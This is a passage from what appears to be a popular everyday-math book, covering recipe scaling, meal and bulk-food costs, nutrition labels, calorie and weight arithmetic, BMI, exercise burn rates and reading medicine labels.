spaghetti sauce, and 18 ounces of Parmesan cheese. 


To scale down by percentage, do the following. 


1. Calculate the percentage you need to decrease each 
ingredient. 
Use this calculation: 


percentage = (desired servings / recipe servings) x 100 
percentage = (2 / 4) x 100 
percentage = 0.50 x 100 
percentage = 50 percent 


2. Multiply each ingredient by the percentage. 
In this example, you multiply by 50 percent, or 0.50: 
Spaghetti = 16 oz x 0.50 = 8 oz 
Sauce = 24 oz x 0.50 = 12 oz 
Parmesan = 6 oz x 0.50 = 3 oz 


So to feed 2 rather than 4 people, you need 8 ounces of 
spaghetti, 12 ounces of spaghetti sauce, and 3 ounces of cheese. 


Scaling up or down by ratio-proportion 
To scale up by ratio-proportion, follow these steps: 


1. Set up a ratio-proportion. 


In this example, you are scaling up from 4 servings to 12 
servings. 


known servings / desired servings = known ingredient amount / desired ingredient amount 
4 / 12 = 16 oz (spaghetti) / x oz (spaghetti) 


2. Cross-multiply and solve. 


4x = 192 
x = 48 oz 


The answer is 48 oz. 
3. Perform the same calculation for the other ingredients in 
the recipe. 


To scale down by ratio-proportion, follow these steps: 


1. Set up a ratio-proportion. 


In this example, you are scaling down from 4 servings to 2 
servings. 


known servings / desired servings = known ingredient amount / desired ingredient amount 
4 / 2 = 16 oz (spaghetti) / x oz (spaghetti) 


2. Cross-multiply and solve. 
4x = 32 
x = 8 oz 
The answer is 8 oz. 


3. Do the same calculation for the other ingredients in the 
recipe. 




If you like to cook (as I do), you can add to the fun by knowing the 
history of the dishes you make. For example, the first Italian 
cookbook with a recipe for tomato sauce was Lo Scalco alla Moderna, 
published in 1692. 


Using Math to Buy and Cook Smart 


Use some smart kitchen math to figure out per-serving costs 
exactly. You may find that a meal you thought to be costly isn’t 
really expensive at all. 


You can also use math to get more value from food (that is, save 
money) when you look at the advantages of buying food in bulk. 


Calculating per-serving costs 


The process for calculating per-serving costs of a meal is simple: 
1. Add up the costs of all the ingredients that make up a 
dish to give you the total cost of the dish. 
2. Divide the total cost of the dish by the number of servings. 


3. Repeat Steps 1 and 2 to figure the costs of each of the 
other dishes in the meal. 


4. Add up the per-serving cost of each dish to get the 
per-serving cost for the meal. 


Here’s an example: Suppose that you want to calculate the per-meal 
cost of a low-cost, three-item spaghetti dinner that serves 4 (refer 
to the earlier section “Scaling in action”). For this example, I’ve 
added a loaf of pre-buttered garlic bread. Also, the spaghetti is the 
cheapest in the store, the sauce is pre-made, and the Parmesan 
cheese is pre-grated in the lowest-priced container sold. The price 
of each of the ingredients is as follows: 


16 ounces of uncooked spaghetti, $1.00 
24 ounces of spaghetti sauce, $2.50 
6 ounces of Parmesan cheese, $2.00 
1 loaf of garlic bread, $3.00 


With the prices at hand, follow these steps: 


1. Add the cost of the spaghetti ingredients. 


total cost = ingredient 1 + ingredient 2 + ingredient 3 
total cost = $1.00 + $2.50 + $2.00 
total cost = $5.50 


2. Divide the total cost ($5.50) by the number of servings. 


per-serving cost = ingredient cost / number of servings 
per-serving cost = $5.50 / 4 
per-serving cost = $1.375 
The answer is about $1.38 per serving. 


3. Divide the cost of the garlic bread ($3.00) by the number 
of servings. 


per-serving cost = ingredient cost / number of servings 
per-serving cost = $3.00 / 4 
per-serving cost = $0.75 


The answer is $0.75 per serving. 


4. Add the cost of the items (spaghetti and garlic bread). 


per-serving cost (whole meal) = item 1 + item 2 
per-serving cost (whole meal) = $1.38 + $0.75 
per-serving cost (whole meal) = $2.13 


The answer is about $2.13 per serving. 


Restaurants always calculate per-serving costs, and you can find 
online calculators that can help you. A good one is 
http://www.free-online-calculator-use.com/restaurant-food-cost-calculator.html. 
Also, want some ideas for inexpensive 
meals? Run an Internet search for “Meals for under $20.” You’ll get 
lots of hits. For that matter, plenty of sites list meals under $10.00. 
Many of these meals are one-pot meals, but you can find other 
types, too. 


Taste by the ton: Buying in bulk 


If you like or use some foods a lot, you may be able to save money 
by buying in bulk. Although buying in bulk can often save you a 
bundle, bulk prices aren’t always a sure way to savings. The trick 
is in knowing when the bulk item is a better deal. 


Fortunately, the math for comparing bulk versus non-bulk prices is 
easy. You simply calculate the per-ounce or per-pound cost of each 
product and then compare the answers. With this method, you can 
figure cost savings right at home, once you know a few prices. (To 
figure cost savings while you’re shopping, jump to Chapter 5.) 


You used to be able to find bulk food only in health food stores, 
but now you can find bulk bins in all major supermarkets, including 
giant national retailers. You can also find bulk bargains in specialty 
markets, such as grocery outlets and restaurant supply stores. 

The bulk bins are great for buying grains, pastas, rice, nuts, and 
cereals. If you’re fortunate enough to live in or near a Latino or 
Hispanic community, you'll find big savings in big bags of beans 
and rice at the local mercado. The same reasoning applies to Indian 
or Pakistani items in England, or North African items in France. 


Say you want to compare the price of a little can of kidney beans 
to a big one. The little can weighs 15.25 ounces and sells for $1.19. 
The big can weighs 108 ounces and sells for $4.69. Follow these 
steps to determine which is the better deal: 


1. Determine the per-ounce price of the little can. 


per-ounce price = price / weight (oz) 
per-ounce price = $1.19 / 15.25 
per-ounce price = $0.078 


Each ounce of kidney beans from the little can costs about 
$0.08. 


2. Determine the per-ounce price of the big can. 
per-ounce price = price / weight (oz) 
per-ounce price = $4.69 / 108 
per-ounce price = $0.0434 


Each ounce of kidney beans from the big can costs a little 
over $0.04. 


When is less more? 


Math isn't subjective, but food is. Quality and the perception of quality can improve 
your satisfaction and also save you money. For example, if you want to serve your 
friends a nice steak dinner, you may first think that the best option is to serve big, 
fat 12-ounce top sirloin steaks. Well, think again. 


Even bargain sirloin can cost $6.00 per pound. A 12-ounce steak is three-quarters 
(3/4) of a pound (a pound has 16 ounces; refer to Table 6-1). Using a calculator 
(or doing some mental math), you can determine that each steak costs $4.50. Filet 
mignon is $16.00 per pound. A 4-ounce filet is one-fourth (1/4) of a pound. Therefore, 
each 4-ounce steak costs $4.00. So you save money by serving filet mignon instead 
of top sirloin, because you pay $4.00 per steak instead of $4.50! 


It’s obvious that the savings is derived from reducing the tonnage of the steak, 
which is a good thing, because 3 ounces is currently the recommended, healthy 
portion size for steak. Therefore, serving a 4-ounce portion is generous. Plus filet 
mignon tastes better, has the reputation of being more “high class” than top sirloin, 
and will impress your friends. 


3. Compare the two prices. 


Compare 4 cents per ounce for the big can with 8 cents per 
ounce for the little can. The big can is a much better deal, 
because the per-ounce price is only half as much. 


You can calculate dry products, such as white rice and beans, 
the same way. For example, if a 1-pound bag of white rice sells for 
$1.69 and a 20-pound bag of white rice sells for $11.98, the math is 
the same. The 1-pound bag costs about $0.10 per ounce, and the 
20-pound bag costs about $0.04 per ounce. If you want to compare 
pounds (which is a little faster), the 1-pound bag costs $1.69 per 
pound, and the 20-pound bag costs about $0.60 per pound. 


Chapter 7 


It Does a Body Good: Math for Health and Well-Being 


In This Chapter 
Calculating whether you’re getting the nutrients you need 
Cutting calories to meet your weight goals 
Figuring your ideal weight and body mass index (BMI) 
Determining the burn rate of common activities 
Taking and giving accurate medication dosages 


Your health is important, and few people would dispute that 
statement. If you’re healthy, you can take advantage of all of 
life’s opportunities. If you’re not healthy, you have some rough 
sailing ahead. 


What is “health,” anyway? The World Health Organization (WHO) 
has defined health as “a state of complete physical, mental, and 
social well-being and not merely the absence of disease or infirmity.” 
Ho! That’s a big order to fill! 


Real-life math can help you get healthy and stay healthy. If you 
apply some basic arithmetic to the components of health — 
nutrition, weight management, exercise, and taking medications — 
you'll know whether you’re on track or need to tweak your 
strategy a bit. In this chapter, you look at key elements of health 
and the accompanying math. 


Figuring Your Nutritional Needs 


To be at optimum health, you need to make sure you're getting the 
right amount of nutrients in what you eat. Each nutrient (protein, 
carbohydrates, and fat, as well as vitamins and minerals) has a 
positive impact. Of course, nutrients satisfy your appetite and give 
you caloric energy, but they do a lot more than that. Here’s a quick 
rundown of the good stuff nutrients do for your body: 


Protein: Proteins are one of the building blocks of body 
tissue. Proteins maintain cell shape and are part of organized 
tissues (otherwise, you’d look like an amoeba). They are also 
needed for cell adhesion (think of white blood cells sticking 
to blood vessel walls to fight infection) and just plain growth. 
Proteins can come from animal sources (beef, chicken, fish, 
eggs, milk, and cheese) or vegetable sources (beans, quinoa, 
soy, lentils, and tempeh). 


Proteins should make up about 10 percent of your daily food 
intake. That’s about 200 calories per day for a 2,000 calorie 
per day diet. 


Carbohydrates: Carbs are a great source of energy. They’re 
also prominent in raising blood glucose levels. The complex 
carbohydrate world is where you find pasta, bread, and cereals. 
The simple carbohydrate world is the home of sugar. 


Complex carbs should make up about 60 percent of your 
daily calorie intake. Complex carbs should make up most of 
your daily carbohydrate intake. Simple carbs should be an 
occasional treat. 


Fats: Fat provides energy, helps your body absorb certain 
nutrients, and keeps your cells healthy. Fats can come from 
animals (butter and lard) or vegetables (peanut oil, coconut 
oil, and the ever-popular olive oil). There are saturated fats, 
unsaturated fats, and monounsaturated fats (of which olive oil 
is best known). Trans fats have a bad reputation because they 
increase your risk of getting coronary heart disease. 


A healthy diet includes a little less than 30 percent fat. 


Vitamins and minerals: Called micronutrients because your 
body needs small amounts, this class of nutrient includes 
vitamin A, the B vitamins, sodium, magnesium, and a whole 
host of others. Each has a particular function, but all of them 
together help ensure your health and well-being. To find out 
how much of each of these nutrients you need daily, head to 
the later section “Following the recommended daily allowance.” 


Proper nutrition requires that you take in the basic nutrients, but 
you also need to consume dietary fiber and micronutrients. And 
that’s basically all there is to it. In the following sections, I tell you 
how to use real-life math to make sure you're getting the nutrients 
you need. 


Read the label, Mabel: Nutrition facts 


Many countries (including the United States, Canada, Australia, 
New Zealand, and those in the European Union) require labeling 
on packaged food. This label (called a Nutrition Facts label in the 
United States) is filled with useful information. 


Learn to read the food label. You can use the information to see 
how many calories and which and how much of key nutrients 
(protein, fats, and carbohydrates) and micronutrients (vitamins 
and minerals) the product has. Figure 7-1 shows two nutrition 
labels for sausages. 


Nutrition Facts (left label) 
Serving Size 2 oz (56g) 
Servings Per Container about 7 
Amount Per Serving: Calories 170, Calories from Fat 140 

                        Amount          % Daily Value* 
Total Fat               15g             23% 
Saturated Fat           5g              26% 
Trans Fat               0g 
Cholesterol             35mg            12% 
Sodium                  570mg           24% 
Total Carbohydrate      2g              1% 
Dietary Fiber           0g              0% 
Sugars                  less than 1g 
Protein                 7g 
Vitamin A 0%, Vitamin C 0%, Calcium 0%, Iron 2% 
INGREDIENTS: PORK, WATER AND LESS THAN 2% OF THE FOLLOWING: SALT, 
CORN SYRUP, DEXTROSE, SPICES, BEEF, ... 


Nutrition Facts (right label) 
Serving Size 1 Link (71g) 
Servings Per Container 4 
Amount Per Serving: Calories 200, Calories from Fat 160 

                        Amount          % Daily Value* 
Total Fat               18g             28% 
Saturated Fat           6g              30% 
Cholesterol             45mg            15% 
Sodium                  630mg           26% 
Total Carbohydrate      1g              1% 
Dietary Fiber           0g              0% 
Sugars                  1g 
Protein                 10g 
Vitamin A 0%, Vitamin C 0%, Calcium 0%, Iron 4% 
INGREDIENTS: Pork, Water, Beer, With 2% or less of the following: Sea Salt, 
Sugar, Natural Spices (including black pepper, ... 

*Percent Daily Values (DV) are based on a 2,000 calorie diet. 

                        Calories: 2,000    2,500 
Total Fat               Less than 65g      80g 
Total Carbohydrate      300g               375g 
Dietary Fiber           25g                30g 


Illustration by Wiley, Composition Services Graphics 


Figure 7-1: Reading nutrition labels. 


The label does most of the real-life math for you. Among other 
things, the “% Daily Value” column shows what portion of 
recommended daily values the item contains for a 2,000- to 
2,500-calorie-a-day diet. (Look at the footnote on the label to see 
the daily calorie intake.) 


Pay particular attention to the following information: 


Serving size and number of servings in a package: This info 
tells you how large (or small) a serving is. Pay close attention 
because all the other information on the label is based on a 
single serving. 


Calories per serving: When you look at the calories per 
serving amount, pay attention to the number of servings in 
the package or the serving size. Many packages that appear to 
be single servings (like a 16-ounce bottle of soda, for example) 
actually have multiple servings in them. 


You will be shocked (shocked!) to learn that some product 
manufacturers play fast and loose with portion sizes to make 
their products seem less calorie-laden. Take a look at Figure 7-1 
again. The right-hand label is for a package containing 4 bratwursts. 
The links are 5 inches long and weigh 2.5 ounces each. 
The serving size is stated as “1 link” — pretty straightforward. 
The left-hand label provides info for a package that contains 
four 8-inch sausages. Each sausage weighs 7 ounces. But 
the serving size is 2 ounces! In other words, a single serving 
is 2/7 of a whole sausage, which works out to be a 2.29-inch 
piece of sausage. This is where most people trip up (and who 
can blame them?) in accurately figuring how many calories or 
nutrients they’re really getting. 


When what appears to be a single-serving package contains 
multiple servings, you can determine the total calories by 
multiplying the “Amount Per Serving” calories by the 
“Servings Per Container” number. And here’s one more tip. 
The standard serving size for a soft drink is 8 fluid ounces, no 
matter what the label says. 


The percentage of the macro- and micronutrients a serving 
gives you: With this info, you can determine where the 
food falls on the “how healthy is it for you” scale. The percentages 
tell you if you’re headed for trouble in the world of protein 
and fat, but especially fat. As a general rule, foods high in 
saturated fats, cholesterol, and sodium are less healthy. 


If you ever want to get a real handle on calories and serving sizes, 
buy a digital kitchen scale. The scale is great fun, and you can 
easily weigh out any quantity of any food you want to eat. 


Your own personal “best” foods list 


Here's some general advice that you can build on to make your own personal list 
of “best” foods: 


Be suspicious of all processed food with added sugar (spaghetti sauce, for 
example), as it's not needed. The “factory food” industry runs, it seems, on 
adding sugar in the form of high-fructose corn syrup. And while I'm on the 
subject of sugar, the best sweetener is real sugar: sucrose in granulated sugar, 
fructose and glucose in honey, and fructose in fresh fruit. 


Be suspicious of any processed food loaded with sodium. Your doctor may 
say you shouldn't add salt to your meals, but the real way to reduce sodium is 
to avoid foods with hidden sodium. 


Beware of high fat content — especially saturated fat. The best fats are the 
polyunsaturated fat in vegetable oil and the monounsaturated fat in olive oil. 


Take a tip from Julia Child. When you want butter, use real butter, not 
margarine or some compromise. And unsalted butter is better. True, butter is 100 
percent fat, and most of it is saturated fat, but I agree with Julia that nothing 
tastes better. Just go easy on the quantity. 


Beware of empty calories. These are foods that have a lot of calories but don't 
add a lot of nutrition. The list of empty-calorie foods includes candy, cookies, 
ice cream, and sugary beverages. To this list, add highly refined grains (white 
bread and white rice) and then put in hamburgers, hot dogs, French fries, fried 
chicken, and pizza. Don't forget alcoholic beverages. These foods aren't without 
some nutritional value, but they're best known for supplying lots of calories 
without supplying lots of nutrients. That's a surefire formula for weight gain. It's 
okay to eat them, but be careful. 


Figuring out your ideal daily calorie intake 


Your ideal daily caloric intake varies with your age, activity level, 
and other factors. Table 7-1 lists ages and the average calorie 
intake for each group (keep in mind that what you need may vary). 
These numbers come from the U.S. Department of Agriculture and 
assume an activity level of 30 minutes or less per day. (That low 
activity, sadly, seems to be the trend in America.) 


Table 7-1    Daily Calorie Intake, by Age 

Category                    Daily Calories 
Children (2-3 years)        1,000 
Children (4-8 years)        1,200-1,400 
Girls (9-13 years)          1,600 
Boys (9-13 years)           1,800 
Girls (14-18 years)         1,800 
Boys (14-18 years)          2,200 
Females (19-30 years)       2,000 
Males (19-30 years)         2,400 
Females (31-50 years)       1,800 
Males (31-50 years)         2,200 
Females (51+ years)         1,600 
Males (51+ years)           2,000 


As I note earlier, how many calories you should eat in a day may be 
different from any chart. To find your daily intake, visit an Internet 
calculator, such as http://www.freedieting.com/tools/calorie_calculator.htm. 
At the site, simply make entries for 
your age, gender, weight, height, and exercise level to get your 
results. My result is 1,834 calories per day, which is lower than the 
number Table 7-1 gives me (2,000 calories). 


Following the recommended daily allowance 


The Dietary Reference Intake (DRI) is a set of recommendations 
from the U.S. National Academy of Sciences that lists about 
29 micronutrients, ranging from vitamin A to zinc, and tells you 
how much of each you need daily. Both the U.S. and Canada use 
the DRI. If you’re meeting the DRI recommendations, you’re 
probably eating healthy. 


You may know the DRI by another acronym: RDA, which stands for 
Recommended Daily Allowance. Same idea and essentially the same 
list with a different name. 


Your everyday-math task is to be familiar with the list and apply it 
when you’re reading food labels. It’s an analysis and judgment job. 
(After all, you can’t be doing arithmetic all the time.) You can find 
the list online in many places. The table at the USDA website 
is too hard to read; instead, visit 
http://en.wikipedia.org/wiki/Dietary_Reference_Intake. 


Calculating Calories 


The food calorie (also known as the calorie or the kcal) is the 
measure of the energy in the food you eat, and it comes from 
the protein, carbohydrates, fat, and alcohol in a food item. That 
energy, when released, powers your body and your brain. It’s the 
cornerstone of physical health. 


Counting calories in your food 


You know that different foods contain different amounts of calories. 
For example, an ordinary slice of bacon has a lot of calories 
(about 43) and a medium cucumber has few calories (about 24). 


Calorie math is based on what you eat and how much you eat. It’s 
a simple calculation: total calories = number of servings x calories 
per serving. A thick strip of bacon, for example, has 61 calories, 
mostly from fat. If you have 4 strips of bacon at breakfast, that’s 
244 calories. If you love bacon and eat a pound at a time, you’ve 
consumed 2,440 calories. 


To find the calories in a complete meal, you determine the number 
of calories for each item and then add them all together. 


Here are several pointers to keep in mind as you calculate the 
number of calories you’re eating: 


For many foods, you can easily determine calories by reading 
food labels. But that doesn’t work in the meat department at 
your supermarket. When it comes to beef, chicken, and fish, you 
have to do some calculating or look up the food on the Internet. 


Honey, does this country make my butt look big? 


The United States leads the world in obesity. Some health experts call it an 
epidemic, and the problem applies to children as well as adults. There are other 
“overweight countries,” too. 


The following table compares obesity in selected countries. Use your analysis skills 
to draw conclusions. 


Country      Obesity Rank    Percent Obese 
U.S.         1               30.60 
Mexico       2               24.20 
UK/Wales     3               23.00 
Germany      14              12.90 
France       23              9.40 
Italy        25              8.60 


By the way, in the U.S., Mississippi leads with 34.9 percent obesity in adults, and 
Colorado is at the tail end, with 20.7 percent obesity in adults. 


Who cares? You should, because obesity contributes to all kinds of illness, 
including coronary heart disease and diabetes. First you get fat; then you get dead. 
(And this comes from an author who is overweight and fighting it every day.) 


Math alert! Statistics are measurements made on large populations. The numbers 
for countries or states don’t account for individual height, health, eating disorders, 
or genetics. See Chapter 3 for more on statistics. 




I found the world’s best calorie and nutrition information at 
http://nutritiondata.self.com. The site has thousands 
of items (including fast food items) and allows you to build 
your own personal list of foods you frequently eat. 


You can find calorie charts on the Internet that list the 
number of calories in a whole range of foods. Just do some 
multiplication to convert the amount of food shown in a chart 
to the amount you really eat. 


Pay attention to serving sizes. If a standard serving of ice 
cream is a half cup but you fill a cereal bowl, you’re eating 
more than a single serving. Adjust your “Number of servings” 
accordingly to get an accurate calorie count. 


Calorie algebra 


When you eat, you're taking in nutrients in the form of protein, carbohydrates, and 
fat. Alcohol has calories but isn't accepted as a nutrient. Food also includes 
micronutrients. See the section “What's in the diet?” for details on those. The different 
nutrients (and alcohol) have a different number of calories: 


Proteins: About 4 calories per gram. 
Carbohydrates: About 4 calories per gram. 
Fats: About 9 calories per gram. 
Alcohol: About 7 calories per gram. 


Don't let calorie counts baffle you. For example, a 4-ounce steak has more calories 
than 4 ounces worth of protein does. Why? Because a steak isn’t all protein. 
A steak has plenty of fat, and that sends the cal count up. You can find out more 
about nutrients and how to make sure you get enough of them in the earlier section 
“Figuring Your Nutritional Needs.” 


Managing your weight with math 


Your body knows how many calories it needs in a day, and it will 
tell you. How? By gaining or losing weight. If you’re getting too 
many calories, your body stores the excess calories as body fat 
(“Once on the lips; forever on the hips”), and you gain weight. If 
you're getting too few calories, your body uses body fat to get the 
energy it needs, and you lose weight. 


To figure out how many calories per day you need, use an Internet 
calorie calculator. Visit http://www.freedieting.com/tools/calorie_calculator.htm. 


Once you know how many calories your body needs in a day to 
maintain your current weight, you can decrease that number to 
lose weight or increase it to gain weight. 


Of course, if your goal is to lose weight, you want to do so safely, and 
that means losing no more than 1 to 2 pounds in a week. Here’s 
what you need to know to manage your rate of weight loss: 


One pound (454 grams) of body fat stores about 3,500 calories. 


To lose 1 pound a week, you need to reduce the total number 
of calories you eat in a week by 3,500. To lose 2 pounds a 
week, reduce your weekly calorie intake by 7,000 calories. 


To make your weekly weight loss goal, divide the number of 
fewer calories you need to eat in a week by 7, the number of 
days in the week. This tells you how many fewer calories you 
need to eat each day. 


reduced calories per day = reduced calories per week / 7 
reduced calories per day = 3,500 / 7 
reduced calories per day = 500 


To lose 1 pound a week, you need to eat 500 fewer calories in 
a day. To lose 2 pounds, you need to eat 1,000 fewer calories 
a day. 


If you find yourself facing a class reunion or wedding a few pounds 
heavier than you’d like to be, you can figure how many pounds you 
need to lose in the time left by dividing the weight you want to lose 
by the number of weeks you have to lose it. 


weight loss per week = pounds to lose / number of weeks 
weight loss per week = 10 / 5 
weight loss per week = 2 


Be careful about crash diets. Your doctor won’t like the idea, and 
many people who lose weight fast gain it back fast. Losing several 
pounds slowly is more sensible than losing them quickly. If you 
know you have an event coming up that you want to look your best 
for — and if “looking your best” means losing weight — start early 
enough that you can reach your goal without going on a crash diet. 
As I mention earlier, 1 to 2 pounds a week is a safe rate of weight 
loss. 


Comparing your current weight to your goal weight 


Weighing too little isn’t good, but the vast majority of people weigh 
too much. If you’re in the majority, you’re probably trying to shed 
a few pounds. If you want to get down to your ideal weight, you 
need to know two things: 


Your ideal weight: Your ideal weight, or goal weight, is a 
generalized number that depends on your gender, height, and 
frame size. You can consult a chart or an Internet calculator. 
(You'll find a good calculator at 
http://www.halls.md/ideal-weight/body.htm.) 


When you find your goal weight, don’t panic! All goal weight 
charts and calculators will make you feel as though they’re 
written for half-starved supermodels. Talk with your doctor. 
The doctor likes lean patients (because they have fewer 
health problems), but he or she won’t suggest an insane goal 
weight. 


Your current weight: Oh, no! Not the scale! Yes, the scale. 
A good scale tells you how much you weigh. No math is 
involved; you merely have to read numbers correctly. So step 
on the darned thing and read your weight. (By the way, if 
possible, get a nice digital scale; many of them are accurate 
within 0.2 pound.) 


Staying on point 


Weight Watchers is a famous program that calculates food in “points.” You're 
allowed so many points per day, plus some additional weekly points. The point 
method is intended to be easier than counting calories, and the program is intended 
to promote good eating habits and more exercise. 


Point values are essentially designed to produce a 1,000 calorie daily deficit in your 
eating (7,000 calories per week), which is likely to result in a weight loss of 2 pounds
per week (see the preceding section). 


Here are the key point calculations: 


The points a food offers are based on a fairly complex proprietary formula, so
you rely on Internet listings and the numbers on the branded food items the 
program sells in stores. (The point values have quite a range. For example, a 
banana split is 19 points, while bamboo shoots are 0 points.) 


Calculating the points you're allowed requires the use of official calculators, 
but you can find other point calculators on the Internet. You enter your age, 
weight, height, exercise level, and number of pounds you want to lose. 
The calculator assigns you 26-71 points to consume each day. You also get 49 
additional “weekly points” to use each week. 


Your daily calculations are simple. When you know your daily and weekly points, 
just write down the point values for what you eat and add ‘em up. Compare the 
points for what you eat to the points you are allowed to see whether you're 
staying on track or veering off the path, so to speak. 


Remember: Point counting and calorie counting have limits. They don't indicate 
nutritional value. Develop healthy eating habits.

With these two numbers (current weight and goal weight), you
simply subtract to see how much you need to lose (or gain). When
your current weight is greater than your goal weight, use this
formula (in this example, the current weight is 189 pounds and the
goal weight is 160 pounds):

amount of weight to lose = current weight - goal weight
amount of weight to lose = 189 - 160
amount of weight to lose = 29


When your current weight is less than your goal weight, you use
this formula (here, current weight is 138 and goal weight is 150):


amount of weight to gain = goal weight - current weight
amount of weight to gain = 150 - 138
amount of weight to gain = 12


In the first case, you might consider losing about 29 pounds. In the 
second case, think about gaining 12 pounds. 


Diet versus dieting 


Your diet is a broad term for everything you eat. It’s largely influenced by culture.
Your diet is a composite of your individual choices, too. You might choose a vegan
diet and eat no dairy or meat, nor anything produced by an animal (like honey); a
pescetarian diet, which includes fish but no meat; an ovo-lacto vegetarian diet, in
which you eat eggs and dairy, but no meat; or any number of other specialized diets.


But for most of history, people have eaten what food they could get. The result 
has been a number of reasonably healthy nations. For example, many people in 
Azerbaijan (a relatively poor country) live to 100 or older, possibly because they eat 
a lot of yogurt, a lot of vegetables, and relatively little meat. 


Dieting is different. Dieting is a conscious plan to gain weight (sometimes) or lose 
weight (usually).

Calculating BMI


The body mass index (BMI), a measurement that’s been around 
for over 150 years, is an approximation of how much body fat you 
have. Your BMI is a really handy number, and it’s easy to calculate. 
The basic idea is that, if you have a high BMI, you’re carrying 
around too much fat. A BMI over 30 means you fit the definition of 
obese. 


To calculate your BMI, you divide your weight by the square of 
your height. 


To calculate BMI with metric units:


BMI = weight in kg / (height in meters)²
BMI = 92.08 / (1.752)²
BMI = 92.08 / 3.069
BMI = 30.00


In American units, the formula is a little different, because it must 
factor in metric-to-American conversions. 


BMI = (weight in lbs / (height in inches)²) x 703
BMI = (203 / (69)²) x 703
BMI = (203 / 4,761) x 703
BMI = 29.97


Don’t want to do the math yourself? You can go online and get the
number from a BMI calculator or BMI charts (easy math, right?).
Visit http://www.webmd.com/diet/calc-bmi-plus. The
calculator not only gives you your BMI, but it also gives you a
number for your body shape (waist-to-height ratio).

Exercise Math


Exercise? What? I'd rather not. But some people — maybe even 
you — love it. Some, like my doctor (a mountain biker), even insist 
that exercise can become a wonderful addiction. 


Doctors recommend exercise to help almost every health condition: 
obesity, diabetes, coronary heart disease, and osteoporosis, to name 
a few. And many people exercise to help lose weight. The object is to 
expend calories, that is, to “burn off” stored body fat in an activity. 


These METs won’t win a pennant: 
Metabolic equivalent of task 


The metabolic equivalent of task (MET) is a relative measure of the 
energy cost of physical activity, which is a fancy way of saying it lets 
you compare the burn rate of different forms of exercise. Figure 7-2 
shows the relative levels of effort of different kinds of exercise. 


Activity
Watching television
Desk work
Walking (1.7 mph)
Walking (2.5 mph)
Walking (3.0 mph)
Walking (3.4 mph)
Bicycling
Stationary bicycling
Jogging


Illustration by Wiley, Composition Services Graphics 


Figure 7-2: MET chart for different activities. 


The higher the MET value, the more energy (and therefore more 
calories) an exercise burns. From Figure 7-2, for example, you see 
that jogging expends 7 times the energy that watching television 
does. The “exercise value” of a MET chart is that you can find forms 
of exercise with higher burn rates (for example, stationary bicycling 
at the gym). The “monetary value” of a MET is that you can see what 
exercise is low-cost or no-cost (for example, walking and jogging). 


The actual burn rate of any particular activity varies from person 
to person and depends on your current weight and fitness level, 
but the MET is relative to all the forms of exercise you do. No 
matter what your age or weight, you'll still burn more calories 
walking than watching TV.

Aerobic versus anaerobic exercise


You don’t need to be a doctor of sports medicine to know about the two broad 
categories of exercise. Aerobic exercise consists of activities with repetitious 
movements over a relatively long period of time. Aerobic exercise is great for your 
respiration and heart function, and includes the treadmill and step aerobics. 


Anaerobic exercise consists of activities that require extreme expenditures of
energy over a relatively short period of time. Anaerobic exercise builds strength 
and muscle mass, and includes weight training (also known as “pumping iron”). 


Down at the gymnasium, you can take in both kinds of exercise. 


Figuring an activity’s 
calorie burn rate 


While MET values show the relative intensity of different forms
of exercise, you will find greater value in knowing the absolute
number of calories that are “burned.” How many calories you
expend per hour (called the burn rate) varies, based on your body
weight. Figure 7-3 shows a sampling of calories used in 1 hour of
cycling for people of different weights.


Activity (1 hour)                      130 lb   155 lb   180 lb
Cycling, <10 mph, leisure bicycling    236      281
Cycling, 14-15.9 mph, vigorous         590      704
Stationary cycling, light              325
Stationary cycling, very vigorous      738


Illustration by Wiley, Composition Services Graphics 


Figure 7-3: Burn rates vary, based on intensity of the activity and body weight. 


You can find such charts on the Internet. To see a lengthy list of
activities, visit http://www.nutristrategy.com/activitylist4.htm;
then just find the activity you like and find your
weight. Write down the “calories per hour” number and figure how
much time you will do the activity.


As helpful as such lists are, even more helpful are calculators
that let you enter your data — weight, intensity level of activity,
and amount of time you performed the activity — and then
produce a report with the number of calories burned. Visit
http://www.healthstatus.com/calculate/cbc and give it a try.

In the following list, I give approximate burn rates for a few activities:


Walking on a treadmill: Walking on a treadmill not only 
improves fitness, but burns calories of body fat. The exact 
burn rate depends on your weight and metabolism. A person 
weighing 180 pounds treading at 4 miles per hour for 
60 minutes burns about 421 calories. 


Lifting weights: Aside from the other benefits of weight training 
(building muscle or firming muscle), a 180-pound person 
lifting weights for 60 minutes burns 281 calories. 


Sleeping: You burn calories even while you're sleeping or
resting. (Is that great news, or what?) The number of calories 
you expend depends on your weight and how long you sleep. 
For example, a 150-pound person sleeping for 8 hours burns 
504 calories! That’s 63 calories per hour. 


Your friend, the pedometer 


A pedometer is a small device that counts the number of steps you take when 
you walk. Everybody's step is a little different, so you do an initial calibration that 
enables the device to accurately “know” the length of your step. This formula is 


step length = known distance ÷ number of steps


You set up for conversion between your step (measured in feet) and walking
distance (measured in miles) by walking a known distance, such as 100 feet. You
divide 100 by the number of steps on the pedometer to determine your step length
(feet per step).


The first pedometers were mechanical. You attached the meter to your waist, and 
when you took a step, the counter registered it. You then later converted the count 
into miles “manually.” 


Say your step is about 3 feet. With the classic pedometer, you would later convert 
using the formula 


miles = (number of steps x step length) ÷ 5,280


Modern pedometers have silicon chips and store the initial calibration, so they do 
mileage calculations for you automatically. 


Nowadays, you can get a free smartphone pedometer app that does everything. 
The app stores distance, time, speed, and calories burned. In addition (and this is 
really cool), the app uses the phone’s GPS feature to show you a map of where you 
just walked. A typical app is “Pedometer FREE,” available at Apple’s iTunes Store, 
and there are similar apps at the Android store.

Being the Doctor at Home


When your spouse, your kid, an older relative, or a close friend 
gets sick, who they gonna call? Probably you. Acting out the role of 
doctor and dispensing medication at home requires great care and 
some easy math. The key techniques are to understand medication 
labels and to dispense the medications correctly. 


Understanding medicine labels 


Prescription and non-prescription medications have labels, which 
tell you a lot about the meds. These labels aren’t really complicated, 
but at first they may seem so, because they contain so much 
legally required information, some of which looks to be in code. 
Figure 7-4 shows a typical medicine label. 


BARRY SCHOENBORN 
AMLODIPINE TAB 5MG 


MRF: GREENSTONE 
TAKE 1 TABLET ONCE DAILY 


WHITE 
OCTAGONAL 
G 1539/5 


CAUTION: Federal law prohibits the transfer of the 


Illustration by Wiley,

Figure 7-4: A typical medicine label.


The vast majority of medications come in the form of tablets (tabs) 
and capsules (caps). That term will be on the bottle. 


The important information on the label is: 


Name: The brand name or generic name of the drug. 


Amount of the active ingredient: This info is usually shown 
in milligrams (mg): For example, aspirin comes in 325 mg 
tablets for adults and 81 mg tablets for children. Occasionally, 
the active ingredient is noted in micrograms (mcg). 


Dosing: This info tells you how much of the medication to 
take and with what frequency. For example, “1 tablet 4 times 
daily.”

